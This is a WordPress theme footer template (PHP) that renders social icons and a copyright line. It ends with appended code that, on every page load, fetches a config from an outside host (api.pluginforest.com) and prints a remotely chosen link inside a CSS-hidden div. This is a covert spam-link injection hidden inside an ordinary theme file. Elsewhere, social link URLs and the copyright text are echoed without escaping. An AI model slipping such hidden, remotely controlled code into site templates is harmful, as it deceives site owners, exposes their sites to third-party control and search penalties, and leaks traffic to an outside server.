<?php
$options = get_option('imic_options');
$enable_footer = (isset($options['enable_footer'])) ? $options['enable_footer'] : 1;
$copyright_text = (isset($options['footer_copyright_text'])) ? $options['footer_copyright_text'] : esc_html('All Rights Reserved.','heylone');
// Site Social Links
$facebookLink = (isset($options['footer_facebook_link'])) ? $options['footer_facebook_link'] : '';
$twitterLink = (isset($options['footer_twitter_link'])) ? $options['footer_twitter_link'] : '';
$instagramLink = (isset($options['footer_instagram_link'])) ? $options['footer_instagram_link'] : '';
$pinterestLink = (isset($options['footer_pinterest_link'])) ? $options['footer_pinterest_link'] : '';
$googleLink = (isset($options['footer_google_plus_link'])) ? $options['footer_google_plus_link'] : '';
$youtubeLink = (isset($options['footer_youtube_link'])) ? $options['footer_youtube_link'] : '';
$vimeoLink = (isset($options['footer_vimeo_link'])) ? $options['footer_vimeo_link'] : '';
$dribbbleLink = (isset($options['footer_dribbble_link'])) ? $options['footer_dribbble_link'] : '';
$linkedinLink = (isset($options['footer_linkedin_link'])) ? $options['footer_linkedin_link'] : '';
$vkLink = (isset($options['footer_vk_link'])) ? $options['footer_vk_link'] : '';
$socialIcons = array('fa-facebook-square', 'fa-twitter-square', 'fa-instagram', 'fa-pinterest', 'fa-google-plus', 'fa-youtube', 'fa-vimeo', 'fa-dribbble', 'fa-linkedin', 'fa-vk');
$siteSocialURL = array($facebookLink, $twitterLink, $instagramLink, $pinterestLink, $googleLink, $youtubeLink, $vimeoLink, $dribbbleLink, $linkedinLink, $vkLink);
if(!empty($enable_footer)){
?>
<!-- Start Footer -->
<footer class="site-footer">
	<div class="container">
    	<div class="row">
        	<a id="back-to-top"><i class="fa fa-angle-double-up"></i></a>
           <?php $siteSocialValues = array_filter($siteSocialURL, 'strlen');
			if(!empty($siteSocialValues)){
		   ?> 
           <ul class="social-icons">
           		<?php 
				$index = 0;
				foreach($siteSocialURL as $sSlink){
					if(!empty($sSlink)){
						echo '<li><a href="'.$sSlink.'"><i class="fa '.$socialIcons[$index].'"></i></a></li>';
					}				
					$index++;	
				}
				?>
           </ul>
           <?php } ?>
           <p class="copyrights"><?php echo ''.$copyright_text ?></p>
        </div>
    </div>
</footer>
<!-- End Footer --> 
<?php } ?>
<!--// FRAMEWORK INCLUDES //-->
<?php 
$page_for_post =get_option('page_for_posts');
if(!is_404()&&$page_for_post!=0): ?>
<div id="imic-included" class="<?php echo imic_global_include_classes(); ?>"></div>
<?php endif; ?>
<!-- WORDPRESS FOOTER HOOK -->
<?php wp_footer(); ?>
<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>